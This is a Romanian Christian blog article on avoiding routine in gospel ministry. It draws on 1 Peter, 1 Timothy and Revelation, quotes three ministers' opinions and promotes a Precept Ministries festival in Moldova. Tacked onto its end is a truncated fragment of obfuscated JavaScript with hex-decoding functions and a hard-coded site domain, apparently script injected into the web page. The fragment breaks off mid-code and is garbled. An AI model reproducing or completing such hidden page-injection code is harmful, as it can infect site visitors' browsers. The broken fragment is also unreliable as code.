Cum să eviți rutina în lucrarea Evangheliei?

Întrebare:

Cum să eviți rutina în lucrarea Evangheliei? Faci aceleași lucruri zilnic (antrenamente, discuții, studiu), dar cum să iei timp de analiză, așa ca să nu te pomenești că lucrezi fără rezultat și lucrezi în zadar?

Există rutină în sens bun, adică disciplina de a face anumite lucruri pentru a crește. Evident că întrebarea nu se referă la aceasta. Vreau, totuși, de la bun început să facem diferența între acestea două. Disciplina ne cere un efort zilnic, pe când rutina rea devine confortabilă și te lași prins în ea, pentru că nu vrei să faci eforturi. În Biblie nu găsim cuvântul “rutină”, dar este scris suficient despre ea. De aceea, am căutat cuvintele care descriu și se referă la aceeași stare și m-am oprit la câteva texte de bază pe care le voi aborda în continuare.

Din felul cum ați pus întrebarea este evident că definiți rutina ca pe o stare când faci aceeași lucrare, dar o faci fără pasiune și, cel mai rău, fără rezultat, pentru că rezultatul nici nu te mai interesează. Cum să ieși din această stare?

Învățătura apostolului Petru pentru evitarea rutinei în lucrarea Evangheliei

Pentru a-i păzi de presbiteri din vremea lui de această cursă, apostolul Petru le-a scris următoarele cuvinte:

Sfătuiesc pe prezbiterii dintre voi, eu, care sunt un prezbiter ca şi ei, un martor al patimilor lui Hristos şi părtaş al slavei care va fi descoperită: păstoriţi turma lui Dumnezeu care este sub paza voastră, nu de silă, ci de bunăvoie, după voia lui Dumnezeu; nu pentru un câştig mârşav, ci cu lepădare de sine. Nu ca şi cum aţi stăpâni peste cei ce v-au căzut la împărţire, ci făcându-vă pilde turmei. Şi când Se va arăta Păstorul cel mare, veţi căpăta cununa care nu se poate veşteji, a slavei. (1 Petru 5:1-4)

Ca să ieși din rutină trebuie să-ți pui zilnic întrebarea: care este voia lui Dumnezeu pentru tine în lucrarea pe care ți-a încredințat-o El să o faci în Evanghelie. Rutina pornește atunci când motivația inimii noastre devine greșită. Dacă nu mai ești motivat de îndeplinirea voii lui Dumnezeu, deja ai căzut în rutină sau dacă motivația îți este suportul financiar pe care îl primești în Evanghelie, te afli în rutină. Fiecare lucrător în Evanghelie are nevoie de un suport financiar, dar dacă acesta devine motivația lui, acesta face ca orice câștig al lui să fie unul mârșav, căci este spurcat de o motivație greșită. Motivația unui slujitor trebuie să fie mântuirea oamenilor și îndeplinirea voii lui Dumnezeu, nu banii și nu câștigul material.

Ca să eviți rutina în lucrarea Evangheliei trebuie să reevaluezi valoarea oamenilor cărora ți-a încredințat Dumnezeu să le slujești. Dacă vei vedea în ei valoare, dacă îi iubești și dorești să contribui la zidirea lor sufletească, atunci rutina nu te va cuprinde, căci vei dori să le oferi tot ce poți mai bun totdeauna.

Învățătura lui Pavel despre evitarea rutinei în lucrarea Evangheliei

Apostolul Pavel a fost toată viața plin de pasiune pentru Hristos și așa i-a învățat pe ucenicii săi să fie. Iată ce cuvinte i-a scris lui Timotei în acest sens:

Nimeni să nu-ţi dispreţuiască tinereţea; ci fii o pildă pentru credincioşi: în vorbire, în purtare, în dragoste, în credinţă, în curăţie. Până voi veni, ia seama bine la citire, la îndemnare şi la învăţătura pe care o dai altora. Nu fi nepăsător de darul care este în tine, care ţi-a fost dat prin prorocie, cu punerea mâinilor de către ceata prezbiterilor. Pune-ţi pe inimă aceste lucruri, îndeletniceşte-te în totul cu ele, pentru ca înaintarea ta să fie văzută de toţi. Fii cu luare aminte asupra ta însuţi şi asupra învăţăturii pe care o dai altora; stăruie în aceste lucruri, căci, dacă vei face aşa, te vei mântui pe tine însuţi şi pe cei ce te ascultă. (1 Timotei 4:12-16)

Dacă îi iubești pe oamenii cărora le slujești și vrei să le fii pildă în toate, nu te vei lăsa niciodată prins în rutină. Vei evalua zilnic calitatea slujirii tale și vei face tot ce este posibil ca să le oferi slujire la calitatea cea mai înaltă. Dacă nu-i mai iubești pe oameni, devii nepăsător și de darul duhovnicesc care este în tine, căci darurile le-am primit ca să le slujim oamenilor. Dacă îi iubești pe oamenii cărora le slujești în Evanghelie, vei fi plin de dorință să le oferi tot ce ai mai bun și vei face tot efortul care este necesar din partea ta.

Ca să ieși din rutină, trebuie mai intâi să recunoști că te afli în ea

Schimbarea unei stări rele a lucrurilor se începe daor atunci când aceasta este recunoscută. Meditând asupra acestei întrebări, am trecut pe lângă camionul defectat pe care l-am suprins în imagine.

Camion ruginit A fost o zi când ceva s-a defectat la acest camion și, evident, stăpânul lui a refuzat să-l repare imediat. Poate nu avea bani sau timp, dar cred că cel mai mare motiv a fost lipsa dorinței de a-l repara. Poate a lăsat camionul parcat la marginea drumului cu gândul că va veni mai târziu să-l repare și iată camionul stă așa de ceva ani. Camionul a fost făcut să slujească cuiva, să transporte marfă etc, dar acum el nu mai slujește nimănui, ci doar prezintă o imagine tristă. Tot așa este și cu slujitorul în Evanghelie care nu întreprinde o schimbare la timp. El nu mai aduce roade care să rămână pentru viața veșnică și slujirea lui nu mai este bine primită de sfinți, căci nu le oferă nimic sau prea puțin comparativ cu așteptările și necesitățile. În cazul camionului, șoferul trebuia din prima zi să identifice defecțiunea și s-o repare. Tot așa trebuia să facă și slujitorul în Evanghelie. Trebuie să-și facă în mod de urgență o evaluare bună și să identifice unde, cînd și cum a apărut această rutină.

În mesajul adresat bisericii din Efes, Domnul Isus S-a referit tot la o stare incipientă de rutină când a spus astfel:

„Ştiu faptele tale, osteneala ta şi răbdarea ta, şi că nu poţi suferi pe cei răi; că ai pus la încercare pe cei ce zic că sunt apostoli, şi nu sunt, şi i-ai găsit mincinoşi. Ştiu că ai răbdare, că ai suferit din pricina Numelui Meu şi că n-ai obosit. Dar ce am împotriva ta este că ţi-ai părăsit dragostea dintâi. (Apocalipsa 2:2-4)

La creștinii din Efes în aparență totul parcă mergea bine. Totuși, ei deveniseră infectați de rutină, pentru că și-au părăsit dragostea dintâi și motivația inimii lor devenise alta. De aceea Domnul Isus le-a spus să-și facă în mod de urgență o analiză personală și apoi să se pocăiască ca să iasă din starea periculoasă în care se aflau. El le-a scris astfel:

Adu-ţi, dar, aminte de unde ai căzut; pocăieşte-te şi întoarce-te la faptele tale dintâi. Altfel, voi veni la tine şi-ţi voi lua sfeşnicul din locul lui, dacă nu te pocăieşti. (Apocalipsa 2:5)

Opinii ale slujitorilor despre evitarea rutinei în lucrarea Evangheliei

Când am primit acesată întrebare, am adresat-o prietenilor mei pe Facebook și am primit mai multe răspunsuri interesante și profunde din care vreau să trec aici trei:

Cred că rutina în lucrarea Evangheliei vine atunci când slujitorul nu mai crește în cunoștința Domnului Isus, adică se vede suficient de ok, încît să mai investească în creșterea sa personală/spirituală – atunci se plafonează la ceea ce știe de ani de zile și bate pasul pe loc. O altă problemă cred că este atunci când slujitorii nu mai produc ucenici, pentru că ucenicii aduc un nou suflu lucrării, vin cu forțe noi, idei noi, cu entuziasm. Dacă nu ai ucenici, faci totul de unul singur și dacă ai și prima problemă, atunci te pomenești în rutină. Dacă privim mai adânc, problema poate fi și o relație cu Dumnezeu focusată mai mult pe activitate spirituală decât pe relație personală, adică se neglijează studiul biblic și părtășia cu Dumnezeu în rugăciune. Dumnezeu este creativ și dacă stai suficient de vorbă cu El despre lucrările pe care le faci, Dumnezeu Însuși vine cu idei noi, te umple de viață, te izbăvește de rutină. Pe de altă parte, rutina este un mijloc mai ușor de a sluji și poate unii slujitori (mai ales din sat, care nu sunt susținuți financiar de către biserică) din cauza oboselii fizice (pentru că sunt nevoiți să lucreze ca să-și cîștige pâinea) aleg calea mai ușoară – ceea ce au mai făcut anterior, pentru că a schimba ceva necesită timp și energie. Cred că se poate scăpa de rutină reieșind din soluționarea problemelor de mai sus: 1. O relație personală cu Dumnezeu (disciplină în rugăciune și studierea Scripturilor). 2. Creșterea ucenicilor, care pot prelua diverse activități din slujire. 3. Biserica să îngrijească de slujitorii săi, ca aceștia să aibă suficient timp să investească în primele două puncte de mai sus! (Iulian Bacaliuc)

Una din definițiile rutinei este să faci același lucru la fel chiar dacă nu mai aduce niciun rezultat și unii slujitori s-au prins in această capcană, pentru că :
– nu doresc să învețe ceva nou
– sunt împotriva metodelor de evanghelizare care aduc rod în Evanghelie
– nu au disciplină în studierea Sfintelor Scripturi și nu are o crestere spirituală personală
– nu doresc să iasă din zona de confort.
După mine, poți ieși din această zonă atunci când îți pasă de oameni.
– când personal ai pasiune pentru studiu biblic
– când nu te mai potrivești chipului acestui veac (Radu Blendarencu).

Rutina este plăcută firii pământești, pentru că faci ceea cu ce ești deprins și în ochii tăi te simti realizat, om de succes. Totuși, rutina cred că distruge lucrarea lui Dumnezeu, pentru că slujitorul nu-și face disciplina să asculte de Dumnezeu, să auda vocea Lui, să studieze cu pasiune Scriptura și, desigur, să fie călăuzit în toate de Dumnezeu. Ca sa scapi de rutină nu este un lucru ușor, totuși este posibil și este o urgență. Mai întîi de toate, slujitorul trebuie să lase totul la o parte, să meargă într-o călătorie de o zi într-o alta localitate, alt anturaj și să facă o evaluare personală și o evaluare a lucrării, apoi să se dedice studierii Cuvîntului în profunzime, să găsească un mentor și să înceapă lucrarea proaspăt, cu viziune și cu inimă. Mai e important pentru slujitor să nu încurce rutina cu disciplina! Prima distruge, a doua dă creștere. (Elena Brewer)

O posibilitate concretă să te eliberezi de rutina în care ai fost prins

La Festivalul Precept Ministries Moldova 2012 în una din zile a venit și pastorul Vlad Lecari care face misiune în câteva sate din nordul țării. Noi studiam cartea Neemia și în fiecare seară ascultam mărturii despre diferite lucrări care se fac în Moldova prin studiu biblic inductiv. În una din zile, pastorul Vlad Lecari mi-a mărturisit că este adânc cercetat de toată învățătura pe care a primit-o și de mărturiile ascultate și că și-a dat seama că se află în rutină și lucrarea lui este lipsită de rezultate. A luat niște decizii importante pentru viața lui și la întoarcere a făcut schimbări majore în viața și sluijrea sa personală. S-a dedicat personal studierii profunde a Sfintelor Scripturi și i-a condus și pe sfinții cărora le slujește să facă la fel. Dumnezeu a binecuvântat lucrarea lui și acum slujește cu multă bucurie și pasiune. Dacă cititorul acestui articol se vede amenințat de rutină în lucrare, îi fac o invitație la Festivalul Precept Ministries Moldova care se va desfășura anul acesta în perioada 25-30 iulie, în incinta taberei “Prietenia” din Coșnița. Învățătorii Mia și Costel Oglice vor preda cursul “Căsătorie fără regrete” și, la fel ca în 2012 și în toți ceilalți ani, în fiecare seară vom asculta mărturii despre lucrarările care se fac în Moldova și în toată Eurasia prin studiu biblic inductiv.

Vă invit să scrieți la comentarii ce experiențe personale aveți în evitarea rutinei. Poate aceasta le va fi de ajutor și altora când o vor afla.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "moldovacrestina.md"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e